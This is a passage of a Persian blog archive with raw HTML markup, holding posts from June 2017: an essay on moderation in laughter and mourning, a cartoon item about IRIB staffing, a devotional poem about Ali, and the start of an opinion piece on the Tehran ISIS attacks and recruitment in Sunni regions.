&nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8297838200/GERY8NDAN_BE_HAR_QEYMATY_1.jpg" alt="http://s9.picofile.com/file/8297838200/GERY8NDAN_BE_HAR_QEYMATY_1.jpg" height="343" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8297838534/GERY8NDAN_BE_HAR_QEYMATY_3.jpg" alt="http://s8.picofile.com/file/8297838534/GERY8NDAN_BE_HAR_QEYMATY_3.jpg" height="330" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8297838984/GERY8NDAN_BE_HAR_QEYMATY_4.gif" alt="http://s8.picofile.com/file/8297838984/GERY8NDAN_BE_HAR_QEYMATY_4.gif" height="333" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> </font></b><p style="line-height: 60px; margin-top: 0; margin-bottom: 0"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font></b> <span style="letter-spacing: -1pt; vertical-align: bottom"> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp;وبلاگ&nbsp; فدایی ، غلامرضا : آن‌چه انسان را انسان می کند توجه به عقلانیت و روشمند زندگی کردن و حفظ تعادل است. عدل و عدالت در همه موارد لازم است و گفته اند که با عدل آسمان وزمین برپاست. انجام امورات مختلف اگر چه نشان از نیاز انسان دارد اما توجه به حد و حدود آن هم از انسانیت انسان خبر می دهد و همین ها بُن مایه فرهنگی می شوند. همچنانکه در موردسخن گفتن هم گفته اند:<br> دو چیز طیره عقل است لب فرو بستن / به وقت گفتن و گفتن به وقت خاموشی...<br> &nbsp;از جمله موارد ضروری برای زندگی انسان خنده و گریه است هر دو برای زندگی انسان لازم است. گاهی می گویند خنده بر هر درد بی درمان دواست و گاهی نیز در مقابل می گویند خنده بر هر درد بی درمان دواست. هر دو آن ها هم درست است و بیانگر نیاز انسان است. اما اگر درست توجه نشود و خنداندن به هر قیمت باشد سر به لودگی می زند همچنانکه اگر در گریه افراط شود از افسردگی سر در می آورد.<br> &nbsp;آنهائی که در هر مورد افراط کنند و جامعه را به آن سمت بکشانند نتیجه آن منحرف کرن جامعه از حد تعادل است. حتما شنیده اید که بعضی از مداحان ویا روضه خوانان بر اثر جهالت و یا افراط در محبت و یا با شنیدن اینکه بر مصائب امامان و به ویژه امام حسین علیه السلام گریه کردن ثواب دارد برای گریاندن به هر چیز حتی مبالغه و دروغ هم متوسل شده اند و نتیجه این شده که جامعه را با بعضی خرافات و امور غیر واقع روبرو کرده ند.</b></font><font size="4" face="Microsoft Sans Serif" color="#00B700"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF"> حماسه حسینی شهید مطهری درد دلی از این افراط کاری هاست. در حالی که در زیارات هم آمده است که ریختن اشک در صورتی ارزش دارد که با معرفت توأم باشد.</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> &nbsp;در مقابل خنداندن هم در عین حال که ضرورت زندگی است اما اگر خنداندن فقط برای خنداندن باشد، نتیجه مطلوبی ندارد. من هر از گاهی که با بچه ها برنامه خندوانه و یا دورهمی را دیده ام تا جائی که ملت را از غم و غصه بیرون آورد بسیار خوب و مطلوب است اما اگر صرفا برای خنداندن باشد و از هر کس و شیوه و برنامه ای صرفا برای خنداندن استفاده کنند و یا تبلیغی برای حمایت کنندگان (اسپانسرها) و کالاهای آنها باشد سر انجام فرهنگی می سازند که آثار مخربش همانند دروغ پردازی هائیست که برای گریاندن مورد استفاده بعضی ها قرار می گیرد.<br> &nbsp;نکته ای که به نظر من باید مورد توجه قرار گیرد این است که انسان همواره باید با هدف، کار و تلاش کند اما از آنجا که کار یکنواخت بر روح و روان او تأثیر مخرب دارد باید برنامه های متنوع خنداندن و گریاندن هر از گاهی باشد تا وی را برای حرکت مجدد آماده کند. از این رو بعد از هر خنده ویا گریه ای باید عقلانیتی که حکم بر مفید بودن و افزایش انرژی می کند برای کار مجدد وجود داشته باشد.<br> &nbsp;اکنون که خدا توفیق خنداندن و یا گریاندن برای ایجاد تعادل روحی و روانی در زندگی به بعضی ها داده است و در این زمینه توانسته اند دنبال کنندگان و یا پیروانی داشته باشند، که حتی نه یکبار بلکه چندین بار برنامه های آنها دیده می شود، با مشاوره با دانشمندان، روانشناسان، جامعه شناسان و فرهنگمداران و عالمان علم اخلاق کاری کنندکه بر سرمایه اجتماعی، فرهنگی و علمی جامعه بیفزایند و مردم را برای کار و تلاش بیشترآماده کنند؛ چیزی که به ویژه در جامعه ما به شدت مورد نیاز است. در غیر اینصورت این نوع کار ها سُکرآور است و همانند مست ها و یا معتادان که به اعتقاد خودشان برای رهایی از مشکلات می خواهند لحظاتی فارغ از همه چیز باشند این برنامه ها هم افراد را به جای در جامعه قرار دادن و با مسائل موجود برای حل کردن درگیرکردن، آنها را به عوالمی می برد که وقتی به خود آمدند می بینند حاصلی برایشان جز اتلاف وقت نداشته است. صاحبان این برنامه ها به همراه صدا و سیما فقط به فکر پر کردن ساعات فراغت نباشند. </b></font> <font size="4" face="Microsoft Sans Serif" color="#00B700"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF">آنها باید بدانند که دارند فرهنگ سازی می کنند که صدای آن چندین سال دیگر در می آید.</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> &nbsp;</b></font></span></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-06-14T12:03:14+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی شاهکار صداوسیمای ما! http://1001SHAYADOBAYAD.mihanblog.com/post/3515 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><h4><font color="#CC0000"><span style="background-color: rgb(204, 204, 255);"><font size="6" face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/%28X%281%29S%28gpb0p1wzhhnqiysuharvrywk%29%29/detail/672501/comic/cartoon" target="_blank">&nbsp; شاهکار صداوسیمای ما!&nbsp;&nbsp; <br></a></font></span></font></h4><p><br></p> <div class="leadCont"> <p align="justify"> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><span>طنز و کاریکاتور&nbsp;&gt;&nbsp;کاریکاتور -<b><font color="#CC0000"> </font></b></span><b><font color="#CC0000">‌40 درصد کارمندان، خارج از ظرفیت استخدام شده‌اند؛ در واقع با توجه به آمار رسمی انجمن بهره‌وری از تناسب جمعیت با تعداد کارمند؛ نیمی از کارمندان صدا و ‌سیما، اضافه‌اند. </font></b></font></span></font></p> </div> <div class=" clear"> </div> <p>&nbsp;</p> <p><img src="http://images.khabaronline.ir//images/2017/6/17-6-3-228221.jpg" width="100%"></p> <p><b><font size="3">مهدی عزیزی. خبرآنلاین</font></b></p><p><br></p><p><br></p><br> <b></b> <font style="font-size:8pt;"> </font> </div> text/html 2017-06-13T15:42:04+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی فریاد زدم : علی ، پناهم دادند ... http://1001SHAYADOBAYAD.mihanblog.com/post/3514 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105); font-family:Tahoma; font-style:normal; font-variant:normal; letter-spacing:normal; orphans:auto; text-align:right; text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; -webkit-text-stroke-width:0px"> <span style="background-color: #F2F2F2"> <font size="6" face="Arial" color="#00B700">&nbsp;&nbsp; فریاد زدم : علی ، پناهم دادند <span lang="fa">.</span>..&nbsp; </font></span></b></b></p><b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <font size="5"> <br> </font> <img src="http://s8.picofile.com/file/8297677750/ALI_ZARBAT_XORDANE_1.jpg" alt="http://s8.picofile.com/file/8297677750/ALI_ZARBAT_XORDANE_1.jpg" class="shrinkToFit" height="523" border="0" width="699"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8297677976/ALI_ZARBAT_XORDAN_2.jpg" alt="http://s9.picofile.com/file/8297677976/ALI_ZARBAT_XORDAN_2.jpg" height="317" border="0" width="699"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8297678192/ALI_ZARBAT_XORDANE_4.jpg" alt="http://s8.picofile.com/file/8297678192/ALI_ZARBAT_XORDANE_4.jpg" class="shrinkToFit" height="530" border="0" width="699"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> </font></b><p style="line-height: 60px; margin-top: 0; margin-bottom: 0"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> <img src="http://s9.picofile.com/file/8297678826/NEG8HE_HAR8M_1.jpg" alt="http://s9.picofile.com/file/8297678826/NEG8HE_HAR8M_1.jpg" height="714" border="0" width="714"></font></b></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <span style="letter-spacing: -1pt; vertical-align: bottom"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; ساقی به پیاله باده كم می ریزی / این میكده را چرا به هم می ریزی؟!&nbsp; <br> &nbsp;از گردش ساغرت شكایت دارم / آسوده بریز! بنده عادت دارم&nbsp; <br> &nbsp;با خستگی آمدم؛ فرح می خواهم / سجاده وُ تسبیح و قدح می خواهم&nbsp; <br> &nbsp;ما قوم عجم به باده عادت داریم / بر پیرمغان «علی» ارادت داریم&nbsp; <br> &nbsp;بر طایفه مان نگاه حق معطوف است / میخانه ی شهر طوس ما معروف است&nbsp; <br> من اهل ری ام ؛ مست ولی اللهم / یك خمره می ِ سفارشی می خواهم&nbsp; <br> در روز ازل كه دل به آدم دادند / فریاد زدم؛ پیاله دستم دادند&nbsp; <br> &nbsp;فریاد زدم : علی - پناهم دادند / اینگونه به این میكده راهم دادند&nbsp; <br> &nbsp;با دیدن این شوق عنایاتی كرد / لبخند علی مرا خراباتی كرد&nbsp; <br> &nbsp;من مست ِ مِی ابوترابم یك عمر / سرزنده به نشئه ی ِ شرابم یك عُمر&nbsp; <br> &nbsp;یك ثانیه بی شراب نتوانم زیست / در مذهب ما حلال تر از مِی نیست&nbsp; <br> &nbsp;جامی بده لب به لب، خرابم ساقی / از مشتریان خوش حسابم ساقی&nbsp; <br> &nbsp;ساقی بده باده-ای كه گیرا باشد / از خُم كهنسال تولا باشد&nbsp; <br> &nbsp;ساقی بده باده-ای كه روشن باشد / خوشرنگ وُ زلال و مردافكن باشد&nbsp; <br> &nbsp;زُهاد پر از افاده را دلخور كن / با نام خدا پیاله ها را پر كن&nbsp; <br> &nbsp;بد مستی ِ من قصه ی پر دنباله است / زیرِ سرِِ ِ باده- ای صد و ده ساله است&nbsp; <br> &nbsp;این بزم مرا اهل سخن می سازد / تنها مِی كوثری به من می سازد&nbsp; <br> &nbsp;من معتقدم باده سرشتی دارد / انگور نجف طعم بهشتی دارد&nbsp; <br> &nbsp;می داخل خُم سینجلی می گوید / قُل می زند، علی علی می گوید&nbsp; <br> &nbsp;هُوهُوی ِ تمام خمره ها را بشنو / تفسیر شگرف « هل اتی» را بشنو&nbsp; <br> &nbsp;با تلخی این دُرد، رطب می چسبد / با حال خوشم توبه عجب می چسبد&nbsp; <br> #<br> &nbsp;گویم به تو حرف عشق بی پرده علی / این شور، مرا به رقص آورده علی&nbsp; <br> &nbsp;با غصه و غم عجب وداعی دارم! / سرمست توام! چه خوش سماعی دارم!&nbsp; <br> &nbsp;هوُ هوُ نكنم ؛ جنون مرا می گیرد / این دل به هوای كربلا می گیرد&nbsp; <br> &nbsp;دیوانه ترم نكن، كجا می كِشیم!؟ / سمت حرم دوست چرا می كِشیم؟&nbsp; <br> &nbsp;تا طور كشانده ای ، عصا می خواهم / یك تذكره ی ِ كرببلا می خواهم&nbsp; </b></font></span></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> &nbsp;</p> </b> </span> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="text-decoration: overline; background-color: #FFFFCC"> <h2 class="hl"> <a href="http://shereemamali.blogfa.com/post-58.aspx"> <font color="#00B700">&nbsp;«وحید قاسمی» </font></a></h2> </span> </b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="text-decoration: overline; background-color: #FFFFCC"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </span> </b> </font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-06-12T22:57:44+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی حملات تروریستی تهران و برخی حقایق تلخ http://1001SHAYADOBAYAD.mihanblog.com/post/3513 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><br><br><font color="#6633FF"><span style="background-color: rgb(204, 204, 255);"><font size="6"><b><font face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/(X(1)S(fet3stkaentr2bk0clx2qcpb))/detail/674811/weblog/dastmali">&nbsp; حملات تروریستی تهران و برخی حقایق تلخ &nbsp;&nbsp; </a></font></b></font></span></font><br><br><div class="leadCont"> <p> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"><span>وبلاگ&nbsp; دستمالی، محمد ، خبرآنلاین : </span>مهاجمین داعشی حملات تروریستی تهران، ایرانی و اهل سنت هستند و تحلیل این مساله، ما را یاری می دهد تا این حقیقت را درک کنیم که برخی کم توجهی ها در مناطق نسی نشین، می تواند فضا را برای یارگیری داعش، مهیا کند. </font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><div class=" clear"> </div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><div class="body"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><p style="text-align: justify;"><b><font size="4" face="arial,helvetica,sans-serif" color="#000099"><span style="background-color: rgb(204, 255, 255);"><span style="font-size: 8pt;">دو حمله تروریستی داعشی های تکفیری در تهران، می توانست دو فاجعه بزرگ در تاریخ معاصر ایران رقم بزند. شک نکنیم اگر مهاجمین سر از صحن مجلس در می آوردند، بیش از یک صد نماینده جان خود را از دست می دادند و تردیدی نداشته باشیم اگر تروریست ها می توانستند در زمانی پرازدحام وارد حرم امام راحل شوند، شمار شهدا از یک هزار نفر هم فراتر می رفت. بنابراین پیش از هر چیز، باید شکر به جا بیاوریم از این که این دو حمله، تنها موجب شهادت 17 هموطن ما شد و رنگ تراژدی و فاجعه بزرگ ملی به خود نگرفت. گام دوم پس از شکر، قدردانی از فداکاری همه نیروهای نظامی، انتظامی و امنیتی جان بر کفی است که علی القاعده، همیشه می توانیم فقط بخش کوچکی از نقش و زحمات آنان را ببینیم و در جریان زحمات پنهان، استرس ها، تمرکز، بی خوابی ها و زحمات آنها نیستیم و بعید می دانم که از نظر حقوق و دستمزد هم وضعیت جالبی داشته باشند. با این همه، دست کم به صورت پیدا و آشکار، نوای اعتراضی از آنان به گوش نرسیده و مردانه به وظایف خود عمل کرده اند.</span></span></font></b></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak">و اما بعد... .<br>به عادت مرسوم، هر جا مشکلی پیش می آید، همیشه دلایل و زمینه های بروز آن را به آمریکا و غرب حواله می دهیم و تصور می کنیم که چاره ی کار در تکرار مرگ بر آمریکا و مرگ بر اسراییل و جدیدا مرگ بر آل سعود است. بله. تردیدی نیست که این مثلث، با تمام توان در پی ضربه زدن به ایران است و هیچ انسان عاقلی نمی تواند منکر نقش آمریکا و اسراییل و دیگران در هدایت و حمایت گروه های افراطی و دخالت مداوم آنان در مسائل جهان اسلام باشد. از استعمار و استثمار تا مداخلات مستقیم و غیرمستقیم چند سده ی اخیر تا هدایت کودتاها و بسیاری دیگر از اقدامات اقتصادی و اجتماعی، ما نیز همچون بسیاری دیگر از کشورهای منطقه، همواره از غرب ضربه خورده ایم. اما به راستی، در تحلیل ماهیت و مساله ی «داعش»، می توانیم صرفا به این گونه استدلالات ضعیف اکتفاء کنیم؟ خود جهان اسلام و اختلافات مذهبی عمیق بین جوامع شیعه و سنی و همچنین اختلافات عمیق علمای دینی، در این مساله نقشی ندارد؟ اهمیت مباحث مهم و پیچیده ای همچون سنی آمریکایی و شیعه ی انگلیسی را از یاد برده ایم؟ خطاهای بزرگ و کوچک کشورهای اسلامی در مواجهه با اقلیت و اکثریت شیعه و سنی چه؟ این نیز بی اهمیت است؟ </font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"><strong>اهمیت ایرانی بودن داعشی های تهران</strong><br>بگذارید اندکی بی تعارف باشیم و به تحلیل یکی از مهم ترین جوانب و ابعاد هویت مهاجمین دو حمله ی تهران بپردازیم. <br>وزارت اطلاعات به درستی و با هدف حفظ حریم و حقوق خانواده ها و وابستگان تروریست های کشته شده در تهران، از بیان نام خانوادگی آنها خودداری کرد. اما در این روزگار عجیب که شبکه های مجازی، امکان اختفا و استتار هیچ موضوعی را باقی نگذاشته اند، خیلی زود مشخص شد که چهار تن از مهاجمین، سنّی مذهب، کُردزبان و اهل یکی از شهرهای کردنشین غرب ایران هستند که اتفاقا در تاریخ جمهوری اسلامی نقش ویژه ای دارد و مردم آن شهر به نجابت، دین داری، مومن بودن و حلال خوری و غیرت و تلاش و قناعت مشهور هستند. اما در هر حال، این افراد از آن دیار برخاسته اند و عقل سلیم به ما می گوید، آنها آخرین داعشی های ایرانی نبوده اند و یارگیری این گروه تکفیری خطرناک، در مناطق سنی نشین غرب، شرق و شمال ایران، ادامه خواهد داشت. کما این که وزارت اطلاعات نیز اعلام کرده که در ظرف چند ساعت، در سه استان کردستان، کرمانشاه و آذربایجان غربی، بیش از چهل نفر را به اتهام ارتباط با داعش، دستگیر کرده است.<br>داعش، همچنان که از بین ده ها کشور اسلامی و اروپایی دیگر، یارگیری نموده، تعدادی از جوانان و نوجوانان اهل سنّت ایران را نیز به دام انداخته است و این دقیقا به معنی سرمایه گذاری داعش بر روی افرادی است که به دلیل آشنایی با زبان فارسی و توان سفر به نقاط مختلف ایران، از توان و امکان بالایی برای طراحی و اجرای عملیات تروریستی در سراسر کشور، برخوردار هستند. <br>باید بپذیریم؛ هر اندازه سرویس اطلاعاتی و 